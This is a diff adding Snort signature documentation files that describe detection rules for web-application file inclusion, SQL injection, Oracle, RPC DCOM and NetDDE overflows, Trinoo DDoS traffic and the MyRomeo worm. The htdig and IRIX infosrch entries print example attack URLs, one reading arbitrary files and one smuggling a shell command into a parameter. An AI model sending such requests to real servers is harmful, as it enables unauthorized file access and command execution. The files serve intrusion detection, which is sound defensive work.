--- /dev/null
+++ b/doc/signatures/100000666.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000666
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "files.php" using a remote file being passed as the 
+"footer_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "footer_prog" parameter in the "files.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2742.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2742
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_varchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/110-4.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+110-4
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically an invalid
+mapping was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000633.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000633
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_active.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_active.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2929.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2929
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/100000471.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000471
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "show.php" with SQL commands being passed as the "objectID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "objectID" parameter in the "show.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1600.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+1600
+
+--
+Summary:
+This event is generated when an attempt is made to read a file on a host using a well known vulnerability in htdig.
+
+--
+Impact:
+Severe. Unauthorized file access
+
+--
+Detailed Information:
+Some versions of htdig allow inclusions to be made from configuration files as a parameter to the htsearch function. Any file can be included by enclosing it in single quotes ('foo').
+
+Using this vulnerability, any single quoted input string (`....`) is included as an index file by htsearch. This allows an attacker to read any file on the host.
+
+This event is generated when a request is made to the cgi script htsearch with file inclusion attempted. Refer to the rule with sid 1601 for further exploitation attempts.
+
+--
+Affected Systems:
+HTDig versions 3.1.1, 3.1.2, 3.1.3, 3.1.4 and 3.2.0b1
+
+--
+Attack Scenarios:
+An attacker can try to include a file in the search parameters for htdig by using the -c flag. For example:
+http://www.foo.com/cgi-bin/htsearch?-c%60/anyfile%60
+
+--
+Ease of Attack:
+Simple. No exploit scripts required
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Related Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+Bugtraq:
+http://www.securityfocus.com/bid/1026
+
+--
--- /dev/null
+++ b/doc/signatures/1500.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1500
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000481.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000481
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Hinton Design PHPHG" application running on a 
+webserver. Access to the file "signed.php" using a remote file being passed as 
+the "phphg_real_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "phphg_real_path" parameter in the "signed.php" script 
+used by the "Hinton Design PHPHG" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Hinton Design PHPHG
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000176.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000176
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the lpd service for HP-UX.
+
+-- 
+Impact: 
+Denial of Service (DoS). Possible code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the lpd service for HP-UX systems. An unauthenticated 
+attacker may issue a DoS attack on the victim lpd by sending malformed data to 
+the lpd service and attempting to overflow a fixed length buffer. It may also 
+be possible for an attacker to execute code of their choosing in the context of 
+the user running lpd.
+
+--
+Affected Systems:
+HP-UX 10.20
+HP-UX B11.10 and B11.11
+
+--
+Attack Scenarios: 
+An attacker can supply a malformed request to the lpd service on the victim 
+host that may leave the service unresponsive.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1820.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1820
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/231.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+231
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
--- /dev/null
+++ b/doc/signatures/728.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+728
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/985.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+985
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1196.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+
+Sid:
+1196
+
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the IRIX infosrch.cgi web application.
+
+--
+Impact:
+Execution of code of the attackers choosing is possible.
+
+--
+Detailed Information:
+sgi IRIX 6.5 through 6.5.7 ships with a web application called InfoSearch
+that is vulnerable to a remote execution attack.
+
+An attacker may have abused the infosrch.cgi web application that ships
+with IRIX 6.5 to remotely execute arbitrary commands as the webserver user.
+
+--
+Affected Systems:
+	SGI IRIX 6.5 to 6.5.7
+ 
+--
+Attack Scenarios:
+An attacker uses an existing, publically known exploit script, or
+sends a simple, handcrafted URL to the webserver such as:
+http://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+The InfoSearch web application may legitimately be used to browse system
+documentation.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to determine whether malicious code was contained in
+the fname HTTP GET variable, such as unix shell commands.  If it looks
+like it may have been malicious code, determine whether the targetted
+web server was running a vulnerable version of IRIX.
+
+Upgrade to the latest non-affected version of the product.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3271.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3271
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3414.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3414
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2625.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2625
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "unregister_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+ 
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
--- /dev/null
+++ b/doc/signatures/3329.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3329
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1424.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1424
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000101.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+100000101
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+vulnerability present in the Adobe Acrobat/Acrobat Reader ActiveX control, 
+pdf.ocx.
+
+-- 
+
+Impact: 
+By using properly crafted packets, attackers may execute arbitrary code of 
+their choosing with the privileges of the user running the affected software.
+
+--
+Detailed Information:
